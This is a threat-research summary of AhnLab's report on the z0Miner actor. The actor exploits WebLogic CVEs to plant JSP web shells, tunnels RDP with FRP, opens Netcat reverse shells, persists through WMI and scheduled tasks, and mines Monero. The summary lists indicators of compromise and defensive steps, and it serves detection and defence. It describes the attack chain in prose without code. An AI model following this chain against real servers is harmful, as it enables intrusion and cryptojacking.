Threat Research

z0Miner Exploits Korean Web Servers to Attack WebLogic Server

Ahnlab

AhnLab ASEC observed the z0Miner threat actor exploiting unpatched WebLogic and other vulnerable Korean web servers to deploy JSP web shells, tunneling tools, remote-access software, and XMRig miners. The actor uses OS-specific download methods (PowerShell/certutil on Windows, curl on Linux), FRP/Netcat/AnyDesk for remote access, and config files pointing to pool.supportxmr[.]com for Monero mining. #z0Miner #XMRig

Keypoints

  • z0Miner exploited WebLogic (CVE-2020-14882/14883) and other exposed servers to upload JSP web shells (JSP File Browser, Shack2, Behinder).
  • Compromised Korean web servers were reused as malware download hosts serving miners, FRP binaries, Netcat, AnyDesk installers, and scripts.
  • Windows deployments used powershell.exe and certutil.exe for retrieval and persistence; Linux hosts used curl to fetch payloads.
  • Remote access and control used Fast Reverse Proxy (FRP) for RDP tunneling, Netcat reverse shells, and AnyDesk for GUI access.
  • XMRig miners distributed in OS-specific builds (Windows 6.18.0, Linux 6.18.1) and configured to use pool.supportxmr[.]com with hardcoded Monero wallets.
  • Persistence was achieved via WMI Event Filter/Consumer and scheduled tasks (schtasks) that invoked PowerShell scripts hosted externally (pastebin links observed).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used WebLogic vulnerabilities to gain access (‘used CVE-2020-14882 and CVE-2020-14883 vulnerabilities to attack WebLogic servers.’)
  • [T1505.003] Server Software Component: Web Shell – Uploaded JSP web shells (JSP File Browser, Shack2, Behinder) to maintain control (‘used JSP WebShell… JSP File Browser, Shack2, and Behinder.’)
  • [T1105] Ingress Tool Transfer – Downloaded binaries and scripts using PowerShell, certutil on Windows and curl on Linux (‘They used powershell.exe and certutil.exe against Windows, and used the curl command against Linux.’)
  • [T1546.004] Event Triggered Execution: Windows Management Instrumentation – Created WMI Event Filter and Consumer for persistence to execute PowerShell from pastebin (‘registered WMI’s Event Filter and Consumer … to read a Powershell script from a certain address of pastebin.com and execute it.’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Used schtasks to schedule recurring execution of downloader PowerShell scripts (‘registered … Task Scheduler (schtasks) to read a Powershell script … and execute it.’)
  • [T1021.001] Remote Services: Remote Desktop Protocol – Employed FRP to proxy/tunnel RDP sessions for remote access (‘used a proxy tool for Remote Desktop Protocol (RDP) communication.’)
  • [T1219] Remote Access Software – Installed AnyDesk to obtain interactive remote control (‘downloaded AnyDesk’ via PowerShell from the compromised download server.)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Used PowerShell scripts for download, execution, and persistence setup (‘The threat actor used the download server … to load the Powershell script’ and various PowerShell downloader code samples.)

Indicators of Compromise

  • [IP:Port] C2 / remote servers – 107.180.100[.]247:88, 15.235.22[.]212:5690, and 15.235.22[.]213:59240
  • [Domain] Mining pool – pool.supportxmr[.]com:443, pool.supportxmr[.]com:80
  • [Wallet] Monero wallet used in config.json – 44VkCrG7DkmYCcrNQcBb1QfZ66si2xWqy7HuzgyWLXKy8x3pkzKWxs8TptTNjCS1b2Abm89MuXD1tg81KeRgfP2u3z6f2kP
  • [File names] Notable payloads / binaries – userinit.exe (Netcat), svcho.exe (frpc), frp5.exe, and other launcher scripts
  • [File hashes MD5] Examples from reported samples – 523613a7b9dfa398cbd5ebd2dd0f4f38 (userinit.exe), 2a0d26b8b02bb2d17994d2a9a38d61db (x.rar XMRig exe), and 19 more hashes

The technical sequence observed begins with exploitation of exposed WebLogic/Tomcat servers using known CVEs to upload JSP web shells (customized JSP File Browser “Zubin”, Shack2 V1.0, and Behinder). Once a web shell is present the actor stages download commands tailored to the host OS: Windows targets receive PowerShell and certutil-based retrievals while Linux targets are fetched via curl. Compromised Korean web servers were reused as HTTP download hosts serving XMRig miners, FRP clients, Netcat binaries, AnyDesk installers, and various scripts.

For remote access and lateral control the actor deployed FRP (both default frpc and statically configured/custom builds) to create tunnels for RDP, and used Netcat for reverse shells (observed as userinit.exe) to obtain interactive command execution. AnyDesk was also installed via PowerShell on some victims to provide GUI remote control. Persistence mechanisms included registering WMI Event Filters/Consumers and creating scheduled tasks (schtasks) that periodically invoked PowerShell scripts hosted externally (pastebin references), ensuring re-delivery of payloads.

The monetization component centered on Monero mining: the attacker deployed XMRig (Windows 6.18.0, Linux 6.18.1) under process names like javae.exe, with a config.json pointing to pool.supportxmr[.]com and a hardcoded Monero wallet. Detection and containment recommendations implicit in the technical findings are to patch WebLogic/Tomcat services, remove unauthorized web shells, block listed C2 IPs and mining pool domains, and hunt for the listed file hashes, filenames, and persistence artifacts (WMI subscriptions and scheduled tasks).

Read more: https://asec.ahnlab.com/en/62564/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint